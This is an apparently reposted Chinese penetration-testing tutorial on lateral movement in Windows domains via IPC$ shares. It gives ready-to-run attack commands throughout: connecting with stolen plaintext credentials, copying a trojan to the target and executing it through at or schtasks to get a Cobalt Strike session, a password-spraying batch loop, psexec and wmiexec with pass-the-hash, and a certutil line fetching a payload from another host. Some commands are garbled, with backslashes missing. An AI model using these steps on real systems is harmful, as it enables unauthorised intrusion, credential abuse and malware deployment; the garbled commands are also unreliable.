【内网渗透基础】四、内网横向-IPC横向

admin 2025年5月20日03:31:27评论1 views字数 3406阅读11分21秒阅读模式
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任。
简介 ]
——————————————————————
没有伤痕累累,哪来皮糙肉厚,英雄自古多磨难。回头看,崎岖坎坷;向前看,永不言弃
摘自《人民日报】 
—————————————————————— 

IPC横向

本文主要讲解如何利用上一篇文中获取的主机明文凭据进行横向攻击,涉及的攻击手段IPC连接和一些工具的使用。IPC(Inter - Process Communication)即进程间通信,旨在让不同进程能够相互交换数据、传递信息,协同完成复杂任务。常见的IPC对象有消息队列(Message Queue)、共享内存(Shared Memory)和信号量(Semaphore

目录
IPC横向
1 建立IPC连接
    2 计划任务执行木马
    3 工具利用

IPC横向

混子Hacker     

01

建立连接

IPC协议是指进程间通信(Inter-Process Communication)的协议和机制,允许不同进程之间进行数据交换和通信

IPC常用命令

net use \ipipc$ "password" /user:域名用户名  #建立连接dir \ipc$ #列出c盘目录type \ip\c$file #查看文件copy shell.exe \ipc$ #拷贝本地文件到指定盘符下copy \ip\c$file local_path #下载文件net use \ipipc$ /delete #删除ipc连接at \ip 时间 c:shell.exe #创建计划任务net use或net share #查看主机ipc连接

建立IPC连接

使用net use

利用上一篇文章中Mimikatz抓取的明文密码创建ipc连接

net use \192.168.52.138ipc$ "password" /user:域名用户名
【内网渗透基础】四、内网横向-IPC横向

使用net usenet share查看主机是否存在ipc连接

【内网渗透基础】四、内网横向-IPC横向

使用dir \192.168.52.138c$ 列出C盘目录

【内网渗透基础】四、内网横向-IPC横向

使用copy将木马通过ipc连接复制到对端主机上

copy shell.exe \192.168.52.138c$

使用dir查看是否上传成功

【内网渗透基础】四、内网横向-IPC横向

使用以下命令删除ipc连接

net use \192.168.232.132ipc$ /delete
【内网渗透基础】四、内网横向-IPC横向

混子Hacker

02

计划任务执行木马

上传成功之后使用定时任务执行木马

添加计划任务有两种方式at和schtasks

at命令:

仅支持Windows早期版本(如Windows XP/7),‌

Windows Server 2012及更高版本已弃用

schtasks命令:

适用于所有现代Windows系统(包括Windows 10/11及Server系列)

是微软推荐替代at的工具‌

1、at创建计划任务
at \192.168.52.138 23:00 c:shell.exe
【内网渗透基础】四、内网横向-IPC横向
在对端主机使用at命令查看计划任务创建成功
【内网渗透基础】四、内网横向-IPC横向
成功上线cs(这里是双网卡主机显示的是另一个IP而已)
【内网渗透基础】四、内网横向-IPC横向
删除计划任务
at 1 /delete
【内网渗透基础】四、内网横向-IPC横向
2、schtasks创建计划任务
schtasks /create /tn hunzihacker /sc ONCE /st 22:00 /tr C:artifact.exe /ru system /tn 计划任务的名称 /sc 计划任务的类型 /st 计划任务的执行时间 /tr 运行的程序或命令 /ru 运行任务的用户
【内网渗透基础】四、内网横向-IPC横向

可以等到时自动运行,也可以使用以下命令直接运行

schtasks /run /s 192.168.52.138 /tn hunzihacker
【内网渗透基础】四、内网横向-IPC横向
【内网渗透基础】四、内网横向-IPC横向
schtasks /query /tn test #查询计划任务schtasks /delete /tn test /f #删除计划任务
批处理多主机尝试For /F %%i in (ips.txt) do net use \%%iipc$ "password" /user:administrator

混子Hacker

03

工具使用

原文链接:

https://www.cnblogs.com/hellobao/articles/17308109.html

1、psexec.py创建交互shell

脚本会通过管道上传一个二进制文件到目标主机C:Windows目录,并在目标机器上创建服务,通过该服务运行二进制文件,运行结束后删除服务和二进制文件(该脚本上传的二进制文件和创建的服务名都是随机的)

python psexec.py god/administrator:hongrisec@2025@192.168.232.132

通过上传一个exe文件创建了一个shell会话

【内网渗透基础】四、内网横向-IPC横向

可以看到在Windows目录下存在一个exe文件

【内网渗透基础】四、内网横向-IPC横向

当退出的时候会删除该exe文件

【内网渗透基础】四、内网横向-IPC横向

2、wmic

Windows 系统管理工具,通过命令行访问 WMI(Windows Management Instrumentation)数据,用于查询、配置和管理本地/远程计算机的软硬件资源

wmic /node:ip /user:xxxx /password:xxxxx  process call create "cmd.exe /c ipconfig>d:result.txt"无需上传第三方软件,利用系统内置程序,单命令执行,执行后无结果回显
【内网渗透基础】四、内网横向-IPC横向

3、cscript

Windows 系统自带的命令行脚本解释器,用于执行 VBScript、JScript 等脚本文件(.vbs、.js)

cscript //nologo wmiexec.vbs /shell 191.168.52.136  需上传wmiexec.vbs然后进入该服务器内进行执行
【内网渗透基础】四、内网横向-IPC横向

4、wmiexec

一款基于 Python 的渗透测试工具,用于通过 WMI(Windows Management Instrumentation) 协议在 Windows 系统上远程执行命令

1.执行命令:python wmiexec.py ./:@192.168.52.136 "cmd.exe /c certutil -urlcache -split -f   http://192.168.52.137:8090/wmi.exe C:wmi.exe"2.用hash的方式:python wmiexec.py -hashes :36ec9d73422e1bf53b84fdb16a8e4198 ./[email protected] "whoami"第三方软件 (交互式&单执行),容易被杀
【内网渗透基础】四、内网横向-IPC横向

5、PsExec64.exe

PsExec 是微软 Sysinternals 工具包中的一款命令行远程管理工具,由 Mark Russinovich 开发,后被微软收购并纳入官方工具集。它主要用于在本地或远程 Windows 系统上执行进程

使用 PsExec 连接到远程计算机时,它首先会在远程计算机上创建一个名为 PSEXESVC 的服务

【内网渗透基础】四、内网横向-IPC横向

psexec的基本原理:

1、通过ipc$连接admin$,释放二进制文件psexecsvc.exe到目标

2、通过服务管理SCManager远程创建一个psexec服务,并启动服务

3、客户端连接执行命令,服务端通过服务启动相应的程序执行命令并回显数据

4、运行结束后删除服务

psexec的使用前提:

1、对方主机开启了 admin$共享,如果关闭了admin$共享,会提示:找不到网络名

2、对方未开启防火墙

3、如果是工作组环境,则必须使用administrator用户连接(因为要在目标主机上面创建并启动服务),使用其他账号(包括管理员组中的非administrator用户)登录都会提示访问拒绝访问。

PsExec64.exe \ip -u <username> -p <password> -s cmd
【内网渗透基础】四、内网横向-IPC横向
本专栏往期文章:

【内网渗透基础】一、信息收集

【内网渗透基础】二、隧道建立

【内网渗透基础】二、隧道建立(下)

【内网渗透基础】三、权限提升-Windows内核提权

【内网渗透基础】三、权限提升-Windows内核提权(下)

【内网渗透基础】三、权限提升-Windows第三方软件提权

【内网渗透基础】三、权限提升-Linux提权

【内网渗透基础】四、内网横向-主机凭据获取

<<<  END >>>

原创文章|转载请附上原文出处链接

更多漏洞|关注作者查看

作者|混子Hacker

原文始发于微信公众号(混子Hacker):【内网渗透基础】四、内网横向-IPC横向

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月20日03:31:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【内网渗透基础】四、内网横向-IPC横向https://cn-sec.com/archives/4081730.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息